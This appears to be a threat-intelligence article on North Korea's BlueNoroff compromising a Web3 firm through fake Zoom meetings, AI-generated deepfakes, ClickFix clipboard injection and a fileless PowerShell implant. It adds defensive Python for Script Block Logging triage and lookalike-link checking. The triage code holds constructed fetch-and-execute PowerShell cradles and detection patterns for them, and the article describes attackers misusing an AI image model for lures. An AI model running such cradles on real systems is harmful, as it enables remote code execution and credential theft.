BlueNoroff Used AI-Generated Zoom Deepfakes to Hide a 66-Day Fileless Implant in a Web3 Firm
BlueNoroff compromised a North American Web3 company using a fake Zoom meeting interface populated with AI-generated deepfakes, deploying a fileless PowerShell implant that maintained persistent access for 66 days while stealing cryptocurrency wallet credentials, browser data, and live webcam footage repurposed to lure future victims.
GLOBAL — Arctic Wolf Labs has published a detailed incident report attributing a sophisticated cryptocurrency theft campaign to BlueNoroff, a financially motivated subgroup of North Korea's Lazarus Group. The campaign — active across more than 20 countries and continuing as of April 2026 — combines spear-phishing via Calendly invites, typo-squatted Zoom and Microsoft Teams domains, AI-generated deepfake video interfaces built using OpenAI's GPT-4o model, ClickFix-style clipboard injection, and a fully fileless PowerShell attack chain that leaves no executable on disk. The primary victim documented by Arctic Wolf was a North American Web3 and cryptocurrency company whose systems were compromised for 66 consecutive days, beginning January 23, 2026.
Campaign Overview: BlueNoroff Fake Zoom Operation

| Field | Details |
|---|---|
| Threat Actor | BlueNoroff / APT38 — financially motivated subgroup of North Korea's Lazarus Group (RGB) |
| Initial Access | Spear-phishing via Calendly invite; typo-squatted Zoom URL replaces legitimate Google Meet link |
| Lure Method | Fake Zoom interface with AI-generated deepfake participants (GPT-4o confirmed via C2PA metadata); live webcam exfiltration of victim |
| Payload Delivery | ClickFix-style clipboard injection — victim copies and runs malicious PowerShell command from fake Zoom SDK update prompt |
| Implant Type | Fully fileless PowerShell C2 implant — memory-resident only, no executable dropped to disk |
| Dwell Time | 66 days of persistent access on primary victim device |
| Geographic Reach | 20+ countries; United States = 41% of identified victims |
| Infrastructure | 80+ typo-squatted Zoom and Teams domains on Petrosky Cloud LLC (AS400897); 950+ media files on attacker server including stolen webcam footage and GPT-4o-generated headshots |
What Happened
The Social Engineering Chain
The attack begins months before the malware executes. BlueNoroff operators — working during Korean Standard Time business hours (08:00–18:00 KST, Monday to Friday) — identify targets in the Web3 and cryptocurrency sector and initiate contact through compromised Telegram accounts impersonating prior victims, or through direct outreach posing as legal or fintech industry figures. The attacker sends a Calendly invite for a professional "catch-up" meeting, which the target confirms. A legitimate Google Meet calendar invite is generated — which the attacker then covertly modifies, replacing the meeting URL with a typo-squatted Zoom domain designed to be visually indistinguishable from a genuine Zoom subdomain. The URL structure mirrors authentic Zoom join links, including meeting ID and password parameters. Arctic Wolf documented the primary victim clicking the malicious URL three times within four minutes — consistent with someone who believed their Zoom client was malfunctioning.
The Fake Meeting and Deepfake Pipeline
When the victim loads the fake URL, their browser renders a self-contained HTML page that recreates the Zoom meeting interface, including fake participant video tiles with looping footage, a cycling active speaker indicator, and — in more sophisticated iterations — AI-generated deepfake video of known industry figures. Arctic Wolf confirmed via C2PA cryptographic metadata that participant headshots on the attacker's server were generated using OpenAI's GPT-4o model. The campaign operates a self-reinforcing deepfake production pipeline: victim webcam footage is silently exfiltrated during the fake meeting, then reprocessed through Adobe Premiere Pro by the attacker to generate realistic lure content for future targets. Of 100 identified prior targets, 36 had real video recordings captured, 5 had static profile images, and 48 were archived for later use.
The ClickFix Payload and Fileless Implant
Once in the fake meeting, victims receive a prompt claiming the Zoom SDK requires updating. The prompt instructs them to copy a command and paste it into the Windows Run dialog or a terminal — a ClickFix-style attack that bypasses traditional download-and-execute detection because no file touches disk. The pasted command downloads and executes an obfuscated secondary PowerShell script from a C2 server. This script establishes a persistent, AES-encrypted, memory-resident C2 implant that communicates via PowerShell and exfiltrates screenshots through the Telegram Bot API. The full attack chain — from initial URL click to complete system compromise — completes in under five minutes. The implant then deploys post-exploitation modules targeting browser credentials, cryptocurrency wallet extensions, SSH keys, Telegram session tokens, and live screen capture. This campaign is distinct from BlueNoroff's earlier AppleScript and ClickFix campaign on macOS, which used different delivery infrastructure and targeted Mac-specific persistence mechanisms.
Scope and Impact
The campaign has spread across more than 20 countries, with the United States accounting for 41% of identified victims. Arctic Wolf's infrastructure analysis uncovered over 80 typo-squatted Zoom and Microsoft Teams domains registered between late 2025 and March 2026 on a single hosting provider, with new domains being added continuously. The volume of distinct payload delivery URLs observed on VirusTotal confirms this is a sustained, large-scale parallel operation — not isolated incidents.
Victim profiles skew heavily toward executive leadership. Nearly half of identified targets hold CEO or founder titles at cryptocurrency and Web3 organizations. This is consistent with BlueNoroff's broader financial theft mandate: executives control wallet access, signing authority, and institutional crypto holdings. The Security Alliance (SEAL) blocked 164 related UNC1069 domains between February 6 and April 7, 2026 — confirming significant parallel operational tempo. BlueNoroff is the same group behind the 2016 Bangladesh Bank SWIFT heist ($81M stolen), the 2022 Axie Infinity hack, and the February 2025 Bybit compromise. Understanding the full scope of social engineering tactics these groups deploy is critical for anyone operating in the Web3 space.
Response and Attribution
Arctic Wolf attributes this campaign to BlueNoroff with high confidence based on infrastructure overlaps with prior BlueNoroff fake conference campaigns documented by Kaspersky and Huntress, operator activity timing consistent with Korean Standard Time business hours, and tool consistency with known BlueNoroff TTPs. The campaign is separately corroborated by SEAL's domain blocking operation and the previously published North Korea npm malware campaign, which used overlapping infrastructure and targeting.
Defensive recommendations from Arctic Wolf include: enabling PowerShell Script Block Logging across all endpoints; restricting browser getUserMedia API access to trusted domains; training staff to verify any meeting request through a secondary communication channel before clicking links; and monitoring for clipboard abuse, unauthorized PowerShell activity, and unexpected access to browser credential stores.
The CyberSignal Analysis
Signal 01 — The Deepfake Production Pipeline Is the Most Alarming Development
The self-reinforcing nature of this campaign — where each victim's webcam footage becomes raw material for luring the next victim — represents a qualitative escalation in social engineering capability. BlueNoroff is not generating synthetic faces from scratch for every target. It is building a library of real, recognizable industry figures whose likeness has been compromised through prior attacks, then deploying those likenesses in precisely targeted fake meetings against people who actually know those individuals. This is not a scalable mass phishing campaign — it is precision social engineering at industrialized volume.
Signal 02 — Fileless Attacks Are Now the Default, Not the Exception
The 66-day dwell time on the primary victim device — achieved entirely through a memory-resident PowerShell implant with no executable on disk — reflects the maturity of fileless attack techniques among state-sponsored actors. Traditional endpoint detection that relies on file-based signatures or on-disk behavioral monitoring will not catch this implant. Detection requires PowerShell Script Block Logging, memory scanning, and network-level C2 traffic analysis. The ClickFix delivery method adds another layer: by making the victim execute the payload themselves via clipboard paste, the initial execution bypasses most download-and-execute detection logic.
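The ClickFix delivery step, the Script Block Logging recommendation from Arctic Wolf, and the detection point made in this Signal all come down to the same question: once logging is on, what does a paste-and-run cradle look like in the Event ID 4104 stream? The following is an added example, not detection logic from the Arctic Wolf report. It scores the ScriptBlockText of constructed 4104 records for traits shared by copied-and-pasted one-liners (hidden window, profile and policy bypasses, an in-memory download followed by Invoke-Expression, an -EncodedCommand blob) and decodes the encoded form so the inner command is scored too. The indicator list, weights and threshold are assumptions; the sample events and the `example.invalid` hosts in them are constructed.

```python
"""Triage PowerShell Script Block Logging events for ClickFix-style cradles.

Added example, not detection logic from the Arctic Wolf report. Script
Block Logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational,
turned on by the EnableScriptBlockLogging policy) records the text of every
block PowerShell runs, so a cradle pasted into the Run dialog is logged
even though nothing is written to disk. Indicator weights and the
threshold below are assumptions tuned for one-liners; events are constructed.
"""
import base64
import re

# (name, pattern, weight): traits typical of a copied-and-pasted cradle.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I), 2),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    ("bypass_policy", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I), 1),
    ("encoded_command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    ("download_cradle", re.compile(
        r"Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest|Invoke-RestMethod|\b(?:iwr|irm)\b", re.I), 3),
    ("invoke_expression", re.compile(r"Invoke-Expression|\biex\b", re.I), 3),
    ("base64_decode", re.compile(r"FromBase64String", re.I), 1),
]
THRESHOLD = 5  # a download cradle plus iex alone (3 + 3) crosses it

ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(text):
    """Return the UTF-16LE payload hidden behind -EncodedCommand, or None."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_script_block(text):
    """Return (score, sorted indicator names) for one script block.

    Both the logged text and the decoded -EncodedCommand payload (if any)
    are scanned, so an encoded cradle scores like a plain one.
    """
    hits = {}
    for layer in (text, decode_encoded_command(text)):
        if layer is None:
            continue
        for name, pattern, weight in INDICATORS:
            if pattern.search(layer):
                hits[name] = weight
    return sum(hits.values()), sorted(hits)


def is_clickfix_like(text):
    return score_script_block(text)[0] >= THRESHOLD


def triage(events):
    """Return [(score, indicators, text)] for 4104 events at or above THRESHOLD."""
    flagged = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        text = ev.get("ScriptBlockText", "")
        score, hits = score_script_block(text)
        if score >= THRESHOLD:
            flagged.append((score, hits, text))
    return flagged


# Constructed -EncodedCommand payload: the command a pasted one-liner hides.
_ENCODED = base64.b64encode("irm http://example.invalid/p | iex".encode("utf-16-le")).decode()

# Constructed 4104 records, trimmed to the fields the triage uses.
SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockText": r"Get-ChildItem -Path C:\Users -Recurse | Measure-Object"},
    {"EventID": 4104, "ScriptBlockText":
        "powershell -w hidden -nop -ep bypass -c \"iex (New-Object Net.WebClient)"
        ".DownloadString('http://example.invalid/u')\""},
    {"EventID": 4104, "ScriptBlockText": f"powershell -nop -w hidden -enc {_ENCODED}"},
]

if __name__ == "__main__":
    for score, hits, text in triage(SAMPLE_EVENTS):
        print(f"[score {score}] {', '.join(hits)}\n    {text[:100]}")
```

Because 4104 also logs the downloaded script once `iex` runs it, the first flagged block is the pivot point from which the rest of the chain can be reconstructed; the score on the outer one-liner only has to be good enough to surface that pivot. Exact-string allowlists for known administrative scripts are the usual way to keep the benign side quiet without lowering the threshold.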
Signal 03 — Calendly and Calendar Workflows Are an Undefended Attack Surface
The use of legitimate Calendly invites to establish initial trust — followed by covert link replacement in the resulting calendar event — exploits a workflow that most organizations treat as implicitly safe. Calendar invite links are rarely inspected with the same scrutiny as email attachments. Security awareness training that covers malicious attachments and phishing emails is not sufficient for this attack pattern. Organizations need explicit guidance for employees on verifying meeting links through secondary channels before clicking, particularly for meetings with external contacts in high-value sectors.
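The link-replacement step described under The Social Engineering Chain, and the verification guidance this Signal calls for, can be partly automated at the point where a calendar event is rendered or a link is about to be opened. The following is an added example, not code from Arctic Wolf or from any of the vendors named: it checks whether a meeting URL's registrable domain really belongs to the brand its hostname imitates, flags a non-HTTPS scheme and non-ASCII or punycode labels, notes when the path and query are shaped like a Zoom join link, and compares the link an invite originally carried against the one it carries now. The trusted-domain sets, the brand keywords, and the lookalike hosts in the test inputs are assumptions or constructed values; registrable-domain extraction uses the naive last-two-labels rule, which is wrong for suffixes such as `.co.uk`.

```python
"""Verify that a meeting link points where its hostname claims to.

Added example (not Arctic Wolf's or any vendor's code). Lookalike hosts used
as inputs are constructed. Registrable-domain extraction is the naive
'last two labels' rule (an assumption that breaks on suffixes like .co.uk);
use a Public Suffix List library for production use.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Registrable domains assumed to legitimately host each brand's join links.
BRANDS = {
    "zoom": {"zoom.us", "zoom.com"},
    "teams": {"microsoft.com", "live.com"},
    "meet": {"google.com"},
}


def registrable_domain(host):
    """Naive registrable domain: the last two labels (assumption, see above)."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def brands_in_host(host):
    """Brand keywords a lookalike host is borrowing, e.g. 'zoom' in
    'us02web-zoom.us.example-join.com'. 'meet' must be a whole label so
    words like 'meeting' are not counted."""
    labels = re.split(r"[.-]", host)
    return {b for b in BRANDS if b in host and (b != "meet" or b in labels)}


def check_meeting_url(url):
    """Return a verdict dict for one meeting URL.

    verdict is one of: 'trusted' (brand keyword and registrable domain agree),
    'lookalike' (brand keyword on an unrelated registrable domain),
    'suspicious' (non-HTTPS, or a homoglyph/punycode hostname) or 'unknown'.
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".")
    issues = []
    if parts.scheme != "https":
        issues.append("not https")
    if not host.isascii() or any(l.startswith("xn--") for l in host.split(".")):
        issues.append("non-ASCII or punycode label (possible homoglyph)")
    # Zoom join links look like /j/<meeting id>?pwd=...; a copy of that shape on
    # a foreign domain is exactly what the report describes.
    mirrors_zoom = bool(re.fullmatch(r"/j/\d{9,11}", parts.path)) and "pwd" in parse_qs(parts.query)

    reg = registrable_domain(host)
    brands = brands_in_host(host)
    if issues:
        verdict = "suspicious"
    elif brands and any(reg in BRANDS[b] for b in brands):
        verdict = "trusted"
    elif brands:
        verdict = "lookalike"
    else:
        verdict = "unknown"
    return {"host": host, "registrable_domain": reg, "brands": sorted(brands),
            "issues": issues, "mirrors_zoom_join_link": mirrors_zoom, "verdict": verdict}


def invite_link_swapped(original_url, current_url):
    """True when a calendar event's meeting link no longer sits on the
    registrable domain the original invite used (the covert replacement step)."""
    return (check_meeting_url(original_url)["registrable_domain"]
            != check_meeting_url(current_url)["registrable_domain"])


if __name__ == "__main__":
    # Constructed inputs: one genuine join link, one lookalike, one homoglyph.
    for u in ("https://us02web.zoom.us/j/1234567890?pwd=abc123",
              "https://us02web-zoom.us.example-join.com/j/1234567890?pwd=abc123",
              "https://z\u043e\u043em.us/j/1234567890?pwd=abc123"):
        r = check_meeting_url(u)
        print(f"{r['verdict']:<10} {r['host']}  issues={r['issues']}")
```

The useful output is not the verdict alone but the pair of facts behind it: which brand the hostname borrows and which registrable domain actually serves the page. Surfacing both to the user at click time, or comparing the current invite link with the one the Calendly confirmation originally produced, gives the secondary-channel check a concrete question to ask.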